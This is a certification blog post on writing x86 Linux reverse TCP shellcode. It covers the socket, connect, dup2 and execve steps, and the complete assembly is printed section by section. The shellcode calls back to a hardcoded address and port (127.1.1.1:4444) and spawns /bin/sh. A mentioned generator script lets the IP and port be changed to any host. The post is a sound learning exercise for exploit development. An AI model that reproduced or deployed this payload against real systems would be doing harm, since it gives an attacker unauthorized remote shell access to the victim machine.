x86 Assembly Language and Shellcoding on Linux

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Goal

The goal of this assignment is to craft my own version of linux/shell_reverse_tcp. This means that our shellcode connects to a target host on a specified port and returns a shell.

How it works

To understand how it works, let’s break it down to steps:

  1. Create a socket file descriptor that we can use for communication
  2. Connect to address and port
  3. Connect stdin, stdout and stderr to socket
  4. Execute /bin/sh

Looking at the steps and comparing it to SLAE 0x1 Bind TCP shell, we can see that it’s the same, but with connect to host instead of the bind/listen/accept syscalls. This makes this assignment a walk in the park if you already did the bind shell first and if you didn’t, you should probably start with this instead.

Assembly code

For the embedded code, I removed most of the inline comments. If you want to check out the full source code with all the comments, feel free to do it on my Github. Most of the explanation has been unchanged from SLAE 0x1, but there are some small subtle changes in the old code as well.

Initializing

The first step is to initialize the registers to make sure that we start from a clear state when the shellcode is executed. Why? Because there could be some leftover data remaining in the registers, which can lead to unexpected behaviour. I XORd the EAX register with itself and moved it’s value into the other registers. You can also XOR out the others or instead of moving POP a 0x00 value from the stack.

; xor register eax so we avoid null byte, then mov value into other registers as well   
xor eax, eax
mov ebx, eax
mov ecx, eax
mov edi, eax
mov esi, eax

Socket

Next, we need to create the socket file descriptor. For this, I used the socket() syscall with the SYS_SOCKET socket call. This creates a socket file descriptor and gives back the file handler as the return value. My favorite reference for syscalls is syscalls.kernelgrok.com which shows what each register needs to contain for the given syscall. Upon looking at the reference, we can see that for the sys_socketcall we need to set EAX to 0x66 (102), specify the call in EBX and pass the references in ECX.

For the first socket call (SYS_SOCKET), I needed to specify the domain (protocol family aka IPv4) AF_INET - 0x2, the type (TCP) SOCK_STREAM - 0x1 and the protocol, which in this case is 0x0 as we accept any protocol. To set up the call, I first moved 0x66 into the EAX register for the sys_socketcall, then I incremented the EBX register by one to contain the value of the SYS_SOCKET call. Then I pushed the value of the arguments in reverse order and stored the address in ECX. ECX was XORed out from before so it contained 0x00, EBX is 0x1 because of SYS_SOCKET so this was used for the type argument, while for AF_INET I pushed 0x2 byte on the stack.

socket:
mov al, 0x66 ; 102 sys_socketcall

inc bl ; SYS_SOCKET 1 

push ecx ; 0x0 - any - int protocol
push ebx ; 0x1 - SOCK_STREAM - int type
push byte 0x2 ; 0x2 - PF_INET/AF_INET - int domain

mov ecx, esp ; store argument address in ecx

int 0x80 ; sys_socketcall

Connect

This is the only major change compared to the bind shell. Instead of a the bind/listen/accept I now only had to do a connect function call. To my surprise connecting to a remote host is much-much easier than setting up a bind shell on your machine.

The flow of the code is somewhat similar to the bind function call. I set up the registers for the function call first EAX -> 0x66 SYS_SOCKETCALL and EBX -> SYS_CONNECT. After that I pushed the sockaddr struct onto the stack, first the IP address in network byte order (connects back to localhost by default), then the port 4444, byte 0x2 (as in AF_INET) and finally stored the sockaddr_in pointer in ECX and pushed that on the stack. We also need the addrlen and the socket file descriptor, so I pushed 16 and the sockfd from ESI as well. Finally we just need to move the argument address to ECX and do the syscall.

mov esi, eax ; move sockfd into esi
mov al, 0x66; 102 sys_socketcall
mov bl, 0x3; SYS_CONNECT 

push 0x0101017f; 127.1.1.1 in network byte order 
push word 0x5c11; port 4444 in network byte order
push word 0x2 ; 0x2, sin_family - AF_INET

mov ecx, esp ; store sockaddr_in pointer
push byte 16 ; socketlen_t addrlen 16 bit

push ecx ; sockaddr_in pointer
push esi ; push sockfd

mov ecx, esp ; store argument address in ecx
int 0x80 ; syscall

Duplicate

In this section of the shellcode we bind together stdin, stdout, stderr and the socket file descriptor. I first swapped out EAX and EBX, so EBX points to the file descriptor. After that I zeroed out ECX as a start value for the loop.

duplicate:        
xchg eax, ebx ; move fdescriptor from accept into ebx for oldfd
xor ecx, ecx ; zero out ecx for counter

The loop portion of the code moves 0x3f into EAX, calls the interrupt, increments ECX (loop counter), compares ECX with 0x3 and jumps back to the start of the loop if ECX is not equal to 3. What this means in practice is that it calls the dup2 system call on our socket with stdin, stdout and stderr.

dup2:
mov al, 0x3f ; int dup2 - 63 in hex
int 0x80 ; dup2 syscall
inc cl ; increment loop register
cmp ecx, 0x3 ; compare ecx 0x3 
jne dup2 ; if ecx != 3 continue looping

Execve

In the last part of the shellcode, we spawn /bin/sh. The code is straight out from the previous execve stack exercise without any major changes. We need to push //bin/sh0x0 onto the stack for EBX, the memory adress of //bin/sh,0x0 for ECX and 0x0 for EDX.

execsh:

xor eax, eax ; null out eax
push eax ; null byte

push 0x68732f6e ; hs/n
push 0x69622f2f ; ib//

mov ebx, esp ; move stack pointer into ebx
push eax ; push another null for the sys argv
mov edx, esp ; sysargv arguments - address as above, but now with extra null bytes
push ebx ; push address of the program name -> //bin/sh0x00
mov ecx, esp ; arguments

mov al, 11 ; execve syscall
int 0x80 ; call execve

Call graph

Here is the graph call for the shellcode. As libemu doesn’t work on my machine, I had used radare2 and Cutter to export the call graph.

Graph call in Cutter

Shell

Launching the shellcode on port 4444 in the compiled C test program and connecting to it with netcat.

x86 Assembly Language and Shellcoding on Linux

Shellcode generator

I also made a short shellcode generator script in Python3 to make custom payloads easier. It can be found on my Github repository. Using it is really easy, it takes two arguments (ip and port) and echoes out the modified shellcode to stdout. The way it works is very simple, it transforms the IP and port into hex and replaces them in the hardcoded shellcode. There are a few validation rules, but it doesn’t check for null or other badchars.

Final Thoughts

After doing the previous assignment, this was a walk in the park. It took roughly 20 minutes to change everything in the bind tcp shell, so it connects to a remote host instead of listening locally and another 20 minutes to figure out the changes for the IP in the shellcode generation script. For those who are reading this because they plan to do SLAE, I would recommend starting with this instead of bind TCP.

Even though I found this assignment easier compared to the previous one, I still learned a lot. Coding your own shellcodes teaches you a lot about how they work and what happens to them when you send them to that poor-poor vulnerable service that you wanted to exploit. It was really awesome to see that /bin/sh was still there, waiting for instructions, when the shellcode failed to connect back to my attacker machine. I have seen this previously in the OSCP labs and it all became clear to me after seeing it with my code. These wins are the reason why I love infosec, no matter how much you know, you can always go deeper and learn something new.

Again, all the code is on my Github and if you want to be informed about new posts, just follow me on Twitter at @fuzboxz.